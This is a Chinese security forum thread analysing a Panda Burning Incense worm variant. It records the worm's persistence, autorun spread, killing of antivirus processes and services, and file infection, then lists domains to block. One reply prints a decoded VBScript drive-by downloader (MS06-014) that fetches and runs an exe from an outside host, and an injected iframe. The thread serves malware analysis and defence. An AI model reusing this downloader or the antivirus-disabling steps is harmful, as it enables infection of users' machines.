=.= 从cisrt 回来写完博客..群里狮子就说 krvkr 还在更新新熊猫..自己跑去看看还真滴..继续写分析.

运行样本..
释放文件
C:\WINDOWS\system32\drivers\ncscv32.exe

创建启动项
[software\microsoft\windows\currentversion\run]
"nvscv32"="C:\WINDOWS\system32\drivers\ncscv32.exe"

修改 显示文件和文件夹 注册表
[software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"checkedvalue"=dword:00000000

所有根目录及移动存储生成
X:\setup.exe
X:\autorun.inf
[AutoRun]
open=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

使用命令关闭共享
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y

尝试关闭窗口
天网
防火墙
virusscan
symantec antivirus
system safety monitor
system repair engineer
wrapped gift killer
游戏木马检测大师
超级巡警

尝试关闭进程
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
sreng.exe

结束起自家"兄弟"了
spoclsv.exe
nvscv32.exe
sppoolsv.exe
spo0lsv.exe

删除以下启动项
software\microsoft\windows\currentversion\run\ravtask
software\microsoft\windows\currentversion\run\kvmonxp
software\microsoft\windows\currentversion\run\kav
software\microsoft\windows\currentversion\run\kavpersonal50
software\microsoft\windows\currentversion\run\mcafeeupdaterui
software\microsoft\windows\currentversion\run\network associates error reporting service
software\microsoft\windows\currentversion\run\shstatexe
software\microsoft\windows\currentversion\run\ylive.exe
software\microsoft\windows\currentversion\run\yassistse

禁用以下服务
schedule
sharedaccess
rsccenter
rsravmon
rsccenter
rsravmon
kvwsc
kvsrvxp
kvwsc
kvsrvxp
kavsvc
avp
mcafeeframework
mcshield
mctaskmanager
navapsvc
sndsrvc
ccproxy
ccevtmgr
ccsetmgr
spbbcsvc
symantec core lc
npfmntor
mskservice
firesvc

搜索感染除以下目录外的所有.exe/.scr/.pif/.com/.htm/.html/.asp/.php/.jsp/.aspx文件
windows
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone

感染时..病毒会跳过文件名为 setup.exe 和 ntdetect.com 的文件..并删除.gho文件..

在访问过的目录下生成 desktop__.ini

感染的 .exe/.scr/.pif/.com/ 文件在 头部添加:68,938 字节(病毒主体) 尾部添加:27 字节(标记信息)

感染的 .htm/.html/.asp/.php/.jsp/.aspx 网页文件 在尾部加入
<iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>

用弱口令访问区域内的计算机(games.exe)...

病毒内留下字符
asdf
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
adsf
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
hjjjjjj
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!

杀软大都报了..

香继续烧?  还有二次大爆发?  自己"兄弟"都结束了..喜新厌旧? 二次感染?

哎..不猜了..困死了..

你先睡，我垫后
http://www.lovebak.com/qq.htm中有：

<iframe src=muma.htm width=0 height=0></iframe>

http://www.lovebak.com/muma.htm内容，加密的vbscript，还原后：

<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.krvkr.com/****.exe"
Set Ob = document.createElement("ob"&"je"&"c"&"t")
Ob.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = Ob.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
ExeName="Cn"&"91"&"1.exe"
VbsName="Cn"&"91"&"1.vbs"
Set FPI = Ob.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
AdM=AA&AB
Set Bda = Ob.createobject(AdM,"")
Bda.type=1
Bda.Open
Bda.Write Pop.ResponseBody
Bda.Savetofile ExeName,2
Bda.Close
Bda.Type=2
Bda.Open
Bda.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"Set Shell = Nothing"
Bda.Savetofile VbsName,2
Bda.Close
sRun="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"
Set Run = Ob.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0
</Script>

继续MS06-014
跟krvkr相应的网页内容是一样的，之所以改了地址，相信是为了躲避杀软的关键字查杀。
不过既然样本已经落入我们手中，那么杀软应该很快就可以清除被修改的网页文件中加的这段iframe代码了。

PS：临睡前看到很多人在盯着熊猫烧香样本，汗，为防万一，那个脚本里面的病毒URL就隐去一部分。已经看到的会员，如果私自下载此样本后有什么后果，不关我事，呵呵……

又是熊猫~~~~~~

更新就更新吧..无所谓了  中的人也不在少数..给系统打好补丁

给杀软升级到最新...安装防火墙...上网的时候不随便乱进

然后版主们  和  杀软厂商 都及时更新病毒库..中了又怎样

切..... 网警 有一句话说的特别好  "病毒作者的话是不可以相信的''

我觉得有必要在host文件里面填上一句：
127.0.0.1 http://www.krvkr.com/
之类的，这样即使中了，也不会再从网上下载了

高手玩的就是高招

封杀更新点吧


lovebak.com/krvkr.com/whboy.net

建议广大网友禁止访问以下熊猫更新服务站点
59.63.157.80
hxxp://www.lovebak.com  2007-01-23注册的新域名
hxxp://www.krvkr.com      作恶多端的老域名
hxxp://www.whboy.net

http://hi.baidu.com/killvir/blog/item/86a06e06ac67a57b030881f8.html

病毒作者的话不能相信的..

烧吧，烧吧，给whboy上香！！！

熊猫入党？化身为螺丝刀和扳手？